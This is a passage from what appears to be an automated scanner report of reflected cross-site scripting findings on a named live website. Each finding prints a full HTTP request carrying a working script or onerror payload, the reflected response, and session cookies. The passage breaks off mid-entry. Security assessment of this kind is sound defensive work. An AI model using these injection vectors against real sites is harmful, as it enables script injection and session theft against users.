GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ee202<script>alert(1)</script>b3390fc92dd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&ee202<script>alert(1)</script>b3390fc92dd=1 was not found on this server.</p>
...[SNIP]...

2.297. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8a7bc<a>01a8494ddb5 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28a7bc<a>01a8494ddb5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28a7bc<a>01a8494ddb5 was not found on this server.</p>
...[SNIP]...

2.298. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8812a<script>alert(1)</script>0b6ae324a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult8812a<script>alert(1)</script>0b6ae324a/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult8812a<script>alert(1)</script>0b6ae324a/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.299. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e3b4<script>alert(1)</script>fe977d32c67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating1e3b4<script>alert(1)</script>fe977d32c67/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating1e3b4<script>alert(1)</script>fe977d32c67/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.300. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a2b54<script>alert(1)</script>b775ca99d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themesa2b54<script>alert(1)</script>b775ca99d9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themesa2b54<script>alert(1)</script>b775ca99d9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.301. http://www.resellerbase.com/adult/personals-dating/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6d1cb<script>alert(1)</script>64451e5fca3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/search.php6d1cb<script>alert(1)</script>64451e5fca3?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php6d1cb<script>alert(1)</script>64451e5fca3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.302. http://www.resellerbase.com/adult/personals-dating/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 31ac4<a>c5fd8d2b293 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search31ac4<a>c5fd8d2b293&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search31ac4<a>c5fd8d2b293&opt=2 was not found on this server.</p>
...[SNIP]...

2.303. http://www.resellerbase.com/adult/personals-dating/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9ac56<a>afa3b942c75 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...9ac56<a>afa3b942c75&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...9ac56<a>afa3b942c75&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.304. http://www.resellerbase.com/adult/personals-dating/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9f2bc<script>alert(1)</script>435470a68ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2&9f2bc<script>alert(1)</script>435470a68ad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2&9f2bc<script>alert(1)</script>435470a68ad=1 was not found on this server.</p>
...[SNIP]...

2.305. http://www.resellerbase.com/adult/personals-dating/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/personals-dating/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 55b49<a>e5b72bab3ea was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=255b49<a>e5b72bab3ea HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=255b49<a>e5b72bab3ea was not found on this server.</p>
...[SNIP]...

2.306. http://www.resellerbase.com/adult/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8318d<script>alert(1)</script>07cf9d49e76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult8318d<script>alert(1)</script>07cf9d49e76/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult8318d<script>alert(1)</script>07cf9d49e76/search.php was not found on this server.</p>
...[SNIP]...

2.307. http://www.resellerbase.com/adult/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98999"><script>alert(1)</script>4fd30a2e975a5948 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult98999"><script>alert(1)</script>4fd30a2e975a5948/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:41:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult98999"><script>alert(1)</script>4fd30a2e975a5948/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.308. http://www.resellerbase.com/adult/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218b0"><script>alert(1)</script>31214838003b46819 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/search.php218b0"><script>alert(1)</script>31214838003b46819?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:42:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php218b0"><script>alert(1)</script>31214838003b46819?cat=7&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc/more2.html" style="color: ">
...[SNIP]...

2.309. http://www.resellerbase.com/adult/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82a75<script>alert(1)</script>9ef8ad82204 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/search.php82a75<script>alert(1)</script>9ef8ad82204 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php82a75<script>alert(1)</script>9ef8ad82204 was not found on this server.</p>
...[SNIP]...

2.310. http://www.resellerbase.com/adult/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the Submit3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7dc"><a>d54a4a840d7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /adult/search.php?cat=7&keyword=search...&Submit3=Searchbb7dc"><a>d54a4a840d7&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:36:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/adult/search.php?cat=7&keyword=search...&Submit3=Searchbb7dc"><a>d54a4a840d7&opt=1/more2.html" style="color: ">
...[SNIP]...

2.311. http://www.resellerbase.com/adult/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload b6beb<a>8c115101b49 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/search.php?keyword=search...&Submit3=Searchb6beb<a>8c115101b49&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/search.php?keyword=search...&Submit3=Searchb6beb<a>8c115101b49&opt=2 was not found on this server.</p>
...[SNIP]...

2.312. http://www.resellerbase.com/adult/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64916"><img%20src%3da%20onerror%3dalert(1)>a8498c66c54 was submitted in the cat parameter. This input was echoed as 64916\"><img src=a onerror=alert(1)>a8498c66c54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adult/search.php?cat=764916"><img%20src%3da%20onerror%3dalert(1)>a8498c66c54&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=764916\"><img src=a onerror=alert(1)>a8498c66c54">
...[SNIP]...

2.313. http://www.resellerbase.com/adult/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6b57"><img%20src%3da%20onerror%3dalert(1)>b0d61f4a1dbc55ff4 was submitted in the cat parameter. This input was echoed as e6b57\"><img src=a onerror=alert(1)>b0d61f4a1dbc55ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/search.php?cat=7e6b57"><img%20src%3da%20onerror%3dalert(1)>b0d61f4a1dbc55ff4&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

